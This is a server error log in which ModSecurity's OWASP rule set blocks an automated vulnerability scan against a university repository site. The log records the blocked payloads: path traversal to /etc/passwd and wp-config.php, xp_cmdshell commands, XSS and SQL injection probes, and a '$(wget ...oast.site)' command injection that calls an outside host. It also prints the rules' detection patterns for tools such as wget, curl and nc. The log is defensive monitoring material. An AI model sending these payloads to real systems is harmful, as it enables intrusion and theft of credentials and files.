[Tue Aug 29 11:45:27.360340 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhzvbcAAAAx"]
[Tue Aug 29 11:45:28.407295 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhpwRcAAAAm"]
[Tue Aug 29 11:45:29.426658 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhrqI8AAAAo"]
[Tue Aug 29 11:45:30.410257 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAh13xAAAAAz"]
[Tue Aug 29 11:45:31.403597 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhxwoYAAAAv"]
[Tue Aug 29 11:45:35.496910 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh7wvYAAAA5"]
[Tue Aug 29 11:45:36.638383 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAg8a@oAAAAK"]
[Tue Aug 29 11:45:43.948208 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4qpqz1skr4bjj.oast.site found within TX:1: cjmnbitjmimt14dgn26g4qpqz1skr4bjj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAipS14AAAAF"]
[Tue Aug 29 11:45:47.447972 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhBSCkAAAAX"]
[Tue Aug 29 11:45:48.569548 2023] [:error] [pid 2229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi1yTUAAAAM"]
[Tue Aug 29 11:45:49.350914 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-cCo-f0AAAhZRgoAAAAG"]
[Tue Aug 29 11:45:50.392211 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-sCo-f0AAAfiYycAAAAg"]
[Tue Aug 29 11:45:51.381486 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAipS2QAAAAF"]
[Tue Aug 29 11:45:56.412947 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAipS3QAAAAF"]
[Tue Aug 29 11:46:01.406415 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhZRioAAAAG"]
[Tue Aug 29 11:46:02.352497 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhrqNgAAAAo"]
[Tue Aug 29 11:46:02.366995 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CsCo-f0AAAi5uBgAAAAS"]
[Tue Aug 29 11:46:02.432060 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAi5uBsAAAAS"]
[Tue Aug 29 11:46:07.430072 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gqjq83r4osj78m.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhzvhMAAAAx"]
[Tue Aug 29 11:46:09.429702 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5MAAAAF"]
[Tue Aug 29 11:46:09.490583 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5ysAAAAA"]
[Tue Aug 29 11:46:09.494424 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6MAAAAO"]
[Tue Aug 29 11:46:12.551914 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi-Q-UAAAAH"]
[Tue Aug 29 11:46:13.367206 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAdxUq0AAAAC"]
[Tue Aug 29 11:46:13.430685 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAib50QAAAAA"]
[Tue Aug 29 11:46:13.440801 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhzvh0AAAAx"]
[Tue Aug 29 11:46:14.396105 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAhl0A4AAAAi"]
[Tue Aug 29 11:46:14.440327 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhzviMAAAAx"]
[Tue Aug 29 11:46:15.383120 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAib508AAAAA"]
[Tue Aug 29 11:46:15.406277 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAib51AAAAAA"]
[Tue Aug 29 11:46:18.376148 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAhrqQwAAAAo"]
[Tue Aug 29 11:46:18.498844 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhgoNsAAAAb"]
[Tue Aug 29 11:46:19.392714 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAdxUs0AAAAC"]
[Tue Aug 29 11:46:19.516146 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhrqRYAAAAo"]
